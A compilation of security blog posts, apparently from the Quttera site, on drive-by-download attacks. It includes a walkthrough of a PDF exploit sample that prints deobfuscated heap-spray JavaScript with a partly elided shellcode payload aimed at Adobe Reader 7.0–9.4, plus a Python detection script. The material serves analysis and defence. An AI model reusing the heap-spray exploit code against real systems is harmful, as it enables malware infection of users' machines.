Blackhole Exploit Kit plays with smart redirection

BY DAVID HARLEY Senior Research Fellow
[Another fascinating Blackhole development noted by Aleksandr Matrosov]
This week we have detected another interesting attack vector. This time cybercriminals are using an interesting technique for hiding malicious JavaScript and using implicit iFrame injection. At this moment we are tracking hundreds of infected legitimate web sites in the Russian internet segment using this technique of infection. Let’s analyze this attack method step by step.
If we look at the code on an infected webpage, we can find only one JavaScript file reference. No malicious iFrame is visible in the source code of the infected webpage. In the next stage of our analysis we downloaded this JavaScript code from one of the infected sites (hxxp://winfield-oil.ru/javascript/script.js) for further analysis….
See full analysis at http://blog.eset.com/2012/04/05/blackhole-exploit-kit-plays-with-smart-redirection


An Overview of Exploit Packs (Update 16) April 3, 2012

A good and detailed review of the exploit packs found in the wild.
http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html


Suspicious web – when legitimate content turns dangerous

  • Introduction
  • How legitimate web sites turn dangerous
  • The nature of drive-by-download attack
  • Quttera – infrastructure, technology and benefits
  • Summary

Introduction

There is no doubt that web-based malware is an emerging security threat for websites and web users. Social networks and dynamic content have increased the delivery of sophisticated web threats that evade detection by traditional signature- and pattern-based security technologies.

Hackers install malware on popular web sites by exploiting security weaknesses on their servers and thus gaining full access to the compromised web site. In most cases the malicious code is not visible or easily detected, and it infects the computers of web site visitors when they simply browse the site.

This is one of the main approaches hackers use to spread viruses, hijack Internet devices or steal sensitive data such as credit card numbers or other personal information. Hackers plant malicious code on legitimate websites in order to distribute malware among the site’s visitors and infect as many of them as possible. These attacks can take several forms, including “drive-by downloads” and “dangerous downloads”.

In a “drive-by-download” attack, malware is downloaded to the user’s computer simply by loading an infected web page in a browser; no interaction on the user’s side other than loading the page is required to accomplish the attack.

In a “dangerous download” attack, hackers plant malicious files such as executables, documents or images that contain malicious code on a legitimate, victim web site, and users get infected when they click on links to those files.

Once malware infects a user’s computer, the hackers can make use of the compromised device in various ways, including: logging the user’s keystrokes, using the computer to send spam, making it part of a botnet, distributing more malware, or simply modifying the search results returned by search engines like Google, Bing and Yahoo.

“If a user searched for the websites of major institutions like iTunes, Netflix or the IRS, the search results would return normally. However, if the user tried to click on the link to the websites, the malware on the computer would force a redirect to a different website where the criminals would profit in their advertisement deal…, when an infected computer visited a major website — like Amazon.com — the malware would be able to simply replace regular advertisements on that page with advertisements of their own making” [1].

The malicious code that hackers inject into websites is called web-based malware. It is different from the malware that may end up infecting users’ computers. Web-based malware targets the web browser and works by embedding, sourcing in, or redirecting to malicious content located on the hacker’s website or on an infected legitimate website.

Web-based malware can be found in HTML, JavaScript, Dynamic HTML, AJAX, Flash, PDF, or a variety of other languages and formats. By contrast, PC-based malware usually takes the form of an executable file that runs malicious code directly on the computer’s processor rather than being interpreted by the web browser.

Nowadays, attackers use web-based malware to infect web pages so that those pages serve as distribution points for traditional, PC-based malware.

A typical sequence of events is as follows: the user visits a web page infected with web-based malware and, as a result, malware is downloaded to his or her computer.

 

How legitimate web sites turn dangerous

There are many different ways and technologies hackers use to inject malicious content into legitimate and popular web sites; here are a few of them:

Sourcing in malicious content – web sites often source in content from third-party widgets or mash-ups. If you use third-party widgets or mash-ups on your web site and any of those third-party content providers gets infected, then your website can get infected as a result.

Compromised FTP credentials – hackers can compromise websites using stolen administrative credentials or by exploiting a server vulnerability, and place malicious code onto the site.

Malicious advertisements (“malvertising”) – content publishers and ad networks have become victims of malvertising, where attackers create a malicious advertisement and inject it into a legitimate ad network. The malicious ad is served to users during normal ad rotation on a publisher’s site, and malware is downloaded to the computers of the consumers viewing the ad.

User-generated content – attackers can upload malicious HTML, files (such as images or documents), or links to any website that accepts submissions from visitors. This includes blog comments, product feedback and ratings, or any other user-generated content.

Vulnerabilities in web applications – hackers can exploit vulnerabilities in common web software packages to inject malicious code into websites.

Vulnerabilities in the network – network vulnerabilities can be exploited to gain access to web servers and infect all of the websites hosted on those servers.

 

The nature of “drive-by-download” attack

“Drive-by-download” basically means the injection of malicious executable instructions into a compromised internet device, resulting in the installation of a malicious program. The “drive-by-download” method is one of the major channels for malware distribution and the injection of malicious processes.

In general, a “drive-by-download” attack targets a certain kind of victim application and a certain version of that application, and comprises the exploitation of one or more security weaknesses or vulnerabilities in order to inject malicious code into the memory space of the attacked process.

The malicious code injection phase can be divided into a few logical steps that take place in the JavaScript code performing the attack:

1 – Preparation of the memory layout of the attacked program (web browser or PDF reader)

2 – Generation of the malicious code that will be injected into the memory of the compromised program

3 – Exploitation of a security vulnerability found in the targeted program

4 – Injection of the generated malicious code

5 – Taking control of the execution of the compromised program and installing the malicious programs onto the compromised internet device.

Steps 1 through 4 are, in most cases, implemented in a high-level programming language and differ from attack to attack in order to avoid detection by signature- and pattern-based rules.

One of the major techniques used to overcome signature-based detection is JavaScript code obfuscation, which means that the procedures executed in steps 1-4 are actually generated by the compromised program itself at run time. Because of the nature of high-level programming languages, the same algorithm can be programmed in many different ways, easily defeating traditional protection mechanisms.

 

Quttera – infrastructure, technology and benefits

In order to improve existing identification capabilities we have developed a heuristic, non-signature-based detection infrastructure which is capable of detecting and protecting against various kinds of web threats. The Quttera malicious content detection engine comprises multiple non-signature-based investigation and analytic methods. The engine is capable of identifying JavaScript-based attacks and security vulnerability exploits. On top of that, it detects the JavaScript obfuscation techniques and JavaScript packers used to hide malicious content and dangerous code from signature- and pattern-based identification mechanisms.

The Quttera investigation infrastructure embeds several execution emulators which not only emulate execution on the targeted device but also penetrate the investigated content and detect web threats regardless of the targeted web browser, operating system or internet device.

The Quttera investigation engine includes three main modules:

  • x86 emulator – emulation and detection of shellcode and suspicious sequences of executable instructions
  • JavaScript emulator – emulation and detection of malicious JavaScript scripts and HTML pages
  • PDF reader emulator – detection of malicious PDF files.

Based on this architecture, the Quttera investigation engine is capable of recognizing and detecting:

  • Security vulnerability exploits referencing system internals (x86 architecture)
  • Security vulnerability exploits referencing process internals (x86 architecture)
  • Suspicious sequences of CPU instructions inside text and binary files (x86 architecture)
  • Hidden JavaScript code generated during emulation of the original script or web page
  • Suspicious JavaScript containing code obfuscation or injection of hidden JavaScript
  • Hidden HTML elements generated during emulation of the original script or web page
  • PDF files containing embedded malicious PE files, hidden suspicious actions, hidden suspicious elements and JavaScript code obfuscation
  • Malformed PDF files
  • Encrypted PDF files

The Quttera infrastructure is designed and implemented as a generic investigation engine and can be adopted and integrated into various information security software, such as:

  • Intrusion detection/prevention systems (IDS/IPS)
  • Antivirus and malware detection tools
  • Malicious and suspicious web site detection systems
  • Web site investigation systems
  • Internet security suites
  • Application gateways
  • Mail servers

Summary

The number of attacked and compromised web sites is increasing from day to day, and this has become the most popular attack vector among the bad guys. As it gains speed it brings damage to unsuspecting users and harms the reputation of well-known web sites. Malicious code injection and code obfuscation techniques improve daily and overcome the traditional signature-based approach. It all boils down to this: it is too difficult to distinguish between clean and compromised web sites.
The Quttera infrastructure provides unique capabilities to detect auto-generated malicious web content and JavaScript code obfuscation, and to prevent web site visitors from being infected by injected malicious content.

 

For more information please visit our web site at http://quttera.com

[1] –  http://news.yahoo.com/feds-cyber-criminals-hijacked-4-million-computers-184840508.html

 


The Anatomy of a PDF “Drive-by-Download” attack

The “drive-by-download” method is one of the major channels for malware distribution and the injection of malicious processes. In this post we’ll cover the anatomy of a JavaScript code sample which is used to:

1. Attack the Adobe Reader process
2. Inject malicious CPU code
and finally…
3. Launch the malicious program.

In general, a drive-by-download attack targets a certain kind of victim application and a certain version of that application. It comprises the exploitation of one or more security weaknesses or vulnerabilities in order to inject malicious code into the memory space of the attacked process.

The malicious code injection phase can be divided into a few logical steps that take place in the JavaScript code performing the attack:

I) generate a binary NOP (no operation) sled that will catch the jump of the instruction pointer (IP) during exploit execution

II) populate the memory address space of the victim process with the generated NOP sled

III) generate the binary shellcode, or malicious code, that will receive control over CPU execution after the NOP sled

IV) invoke the vulnerability exploit and pass execution control to the generated NOP sled.

As an example we use a discovered drive-by-download sample targeting Adobe Reader from version 7.0 up to version 9.4. Executing this sample on other versions sends the program into an infinite loop upon execution of the “while(1);” statement. We changed the original variable names to make the code readable and understandable.


/********************************************************************************************
 Main function: recognizes the Adobe Reader version and selects which exploit routine
 to execute, aaaaa() or bbbbb(), depending on the reader's version. The comparisons
 follow the version ranges given in the comments and in the text (7.0 up to 9.4).
********************************************************************************************/

function dddd()
{
    ver = app.viewerVersion;   // retrieves the reader version

    if (ver > 9.4)
    {
        // if the version is greater than 9.4 enter an infinite loop (stick the process)
        while (1);
    }
    else if (ver >= 9)         // for versions between 9.0 and 9.4
    {
        aaaaa();
        var cWord = this.getPageNthWord(2, 0);
        this.selectPageNthWord(2, 0);
    }
    else if (ver >= 8)         // for versions between 8.0 and 9.0
    {
        bbbbb();
        var cWord = this.getPageNthWord(5, 0);
        this.selectPageNthWord(5, 0);
    }
    else if (ver >= 7)         // for versions between 7.0 and 8.0
    {
        bbbbb();
        var cWord = this.getPageNthWord(8, 0);
        this.selectPageNthWord(8, 0);
    }
    else
    {
        // stick the process if the reader version is less than 7
        while (1);
    }
}

function aaaaa()
{
    var u1 = unescape;

    var payload1;

    /***************************************************************************************
     builds a long NOP sled from 'x' characters (0x78), which decodes to the
     "Jump short if sign" (JS) x86 instruction; payload1 is reassigned below,
     so the result of this loop is discarded
    ****************************************************************************************/

    for (i = 0; i < 28002; i++) payload1 += 0x78;

    var u2 = u1;
    var payload1 = u2("\x25\x754141\x25\x754141%u63a5%u4a80....." +

    /************************************************
     this is actually the code of the injected binary malware
    ************************************************/

    "%ue990%u00ad%u0000%u8fc2%ud836%udfa0%ud516%uf0b5" +
    "%u78de%u05d0%ue989%u281b%u56bf%uf7be%ud61e%u1697" +
    // ............................................... (remainder elided in the original post)
    "%ua585%u0000%u5000%ub5ff%u00a1%u0000%u958b%u0081" +
    "%u0000%uff52%u7975%u55ff%u8b30%ua595%u0000%u2900" +
    "%u9d95%u0000%u8300%u9dbd%u0000%u0000%u847f%u75ff" +
    "%uff79%u0055%u90c3");

    /**************************************************************
     builds the NOP sled to spray into the process memory
     (\x25\x75 is "%u", so this string is %u0c0c%u0c0c)
    **************************************************************/

    var nop = u2("\x25\x750c0c\x25\x750c0c");

    while (nop.length + 20 + 8 < 65536) nop += nop;

    SP = nop.substring(0, (0x0c0c - 0x24) / 2);
    SP += payload1;
    SP += nop;

    // SP = [NOP sled][injected binary][NOP sled]

    nop2 = SP.substring(0, 65536 / 2);
    while (nop2.length < 0x80000)
    {
        nop2 += nop2;
    }

    nop3 = nop2.substring(0, 0x80000 - (0x1020 - 0x08) / 2);

    // spray the process's heap

    var arr1 = new Array();
    for (index = 0; index < 0x200; index++) { arr1[index] = nop3 + "s"; }
}

function bbbbb()
{
    var u1 = unescape;

    var payload1;

    /***************************************************************************************
     builds a long NOP sled from 'x' characters (0x78), which decodes to the
     "Jump short if sign" (JS) x86 instruction; payload1 is reassigned below,
     so the result of this loop is discarded
    ****************************************************************************************/

    for (i = 0; i < 28002; i++) payload1 += 0x78;

    var u2 = u1;
    var payload1 = u2("\u4141\u4141\u4141\u4141\u4141\u4141\u17f2\u4a82\u5000\u4a84\u630f\u4a80" +

    /************************************************
     this is actually the code of the injected binary malware
    ************************************************/

    "%ue990%u00ad%u0000%u8fc2%ud836%udfa0%ud516%uf0b5" +
    "%u78de%u05d0%ue989%u281b%u56bf%uf7be%ud61e%u1697" +
    // ............................................... (remainder elided in the original post)
    "%ua585%u0000%u5000%ub5ff%u00a1%u0000%u958b%u0081" +
    "%u0000%uff52%u7975%u55ff%u8b30%ua595%u0000%u2900" +
    "%u9d95%u0000%u8300%u9dbd%u0000%u0000%u847f%u75ff" +
    "%uff79%u0055%u90c3");

    /**************************************************************
     builds the NOP sled to spray into the process memory
    **************************************************************/

    var nop = u2("\x25\x750c0c\x25\x750c0c");
    while (nop.length + 20 + 8 < 65536)
        nop += nop;

    SP = nop.substring(0, (0x0c0c - 0x24) / 2);
    SP += payload1;
    SP += nop;

    // SP = [NOP sled][injected binary][NOP sled]

    nop2 = SP.substring(0, 65536 / 2);

    // generate a long shellcode sled

    while (nop2.length < 0x80000)
        nop2 += nop2;

    nop3 = nop2.substring(0, 0x80000 - (0x1020 - 0x08) / 2);

    var arr1 = new Array();

    // spray the process's heap (same loop bounds as in aaaaa())

    for (index = 0; index < 0x200; index++) { arr1[index] = nop3 + "s"; }
}

/************************************
 script entry point
************************************/

dddd();
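As an added example (it is not code from this post or from Quttera's engine), the Python script below turns the five injection steps listed in the earlier section and steps I) to IV) above into static detection heuristics for a piece of PDF or HTML JavaScript: it undoes the \x25\x75 hiding of %u, decodes the %u payload into the little-endian bytes an emulator would see, and scores the sled-doubling loop and the array spray. The rule weights, the thresholds and the constructed SAMPLE_SPRAY input are assumptions of this example.

```python
import re

# The sample hides "%u" as \x25\x75; JS \uXXXX literals are the same code unit after unescape().
HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")
PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")

# Structural indicators for steps I-IV above; the weights are assumed, not Quttera's.
RULES = {
    "version_fingerprint": (re.compile(r"app\.viewerVersion"), 10),
    "unescape_call": (re.compile(r"\bunescape\b"), 10),
    "sled_doubling_loop": (re.compile(r"while\s*\(\s*\w+\.length[^)]*<[^)]*\)\s*\{?\s*\w+\s*\+=\s*\w+"), 25),
    "array_spray_loop": (re.compile(r"for\s*\([^)]*\)\s*\{?\s*\w+\[\w+\]\s*=\s*\w+"), 25),
}

def normalize_escapes(js_text):
    """Undo string-literal escaping so %uXXXX payloads become visible."""
    text = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), js_text)
    return JS_UNICODE.sub(r"%u\1", text)

def decode_percent_u(js_text):
    """Bytes an emulator sees after unescape(): one UTF-16 code unit per %uXXXX, little-endian."""
    out = bytearray()
    for code in PERCENT_U.findall(normalize_escapes(js_text)):
        out += int(code, 16).to_bytes(2, "little")   # %u4a80 -> 80 4a
    return bytes(out)

def longest_repeat_run(data, width=2):
    """Longest run of one repeated chunk: a sprayed sled (0c0c0c0c...) is a very long run."""
    best, cur, prev = 0, 0, None
    for i in range(0, len(data) - width + 1, width):
        chunk = data[i:i + width]
        cur = cur + 1 if chunk == prev else 1
        prev, best = chunk, max(best, cur)
    return best

def scan(js_text, min_escapes=32, min_sled_run=64):
    """Return the triggered indicators and a 0-100 risk score for one script."""
    text = normalize_escapes(js_text)
    hits = {name: bool(rx.search(text)) for name, (rx, _) in RULES.items()}
    payload = decode_percent_u(js_text)
    hits["long_unicode_payload"] = len(payload) // 2 >= min_escapes
    hits["nop_sled_run"] = longest_repeat_run(payload) >= min_sled_run
    score = sum(w for name, (_, w) in RULES.items() if hits[name])
    score += 15 * (hits["long_unicode_payload"] + hits["nop_sled_run"])
    return {"indicators": hits, "score": score}

# Constructed sample shaped like aaaaa()/bbbbb() above, with a dummy %u pattern as payload.
SAMPLE_SPRAY = (
    "function go() {\n  var ver = app.viewerVersion;\n"
    '  var nop = unescape("\\x25\\x750c0c\\x25\\x750c0c");\n'
    "  while (nop.length + 28 < 65536) nop += nop;\n"
    '  var sc = unescape("' + "%u1234%u5678%u9abc%udef0" * 10 + '");\n'
    "  var arr = new Array(); for (i = 0; i < 0x200; i++) { arr[i] = nop + sc; }\n}\n")
```

scan(SAMPLE_SPRAY) scores 85 with every indicator set except the long sled run, because the sled only becomes long after the doubling loop runs, which a static scan does not execute; an emulator, as described in the earlier section, would see it.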


Not sure whether your web site is free of suspicious JavaScript code?
Scan it for free with our web investigation service at quttera.com
Your feedback is appreciated.

For more articles visit our articles page at www.quttera.com/articles.


mysql.com hack signature met once again

Once again we meet the same obfuscation pattern previously used in the mysql.com attack.

This is the main body of the script.

It is finally translated into the following code, which injects a hidden iframe that redirects the user
to the http://1nvesttsmenttsclybs.info URL, known for distributing a Trojan.


 
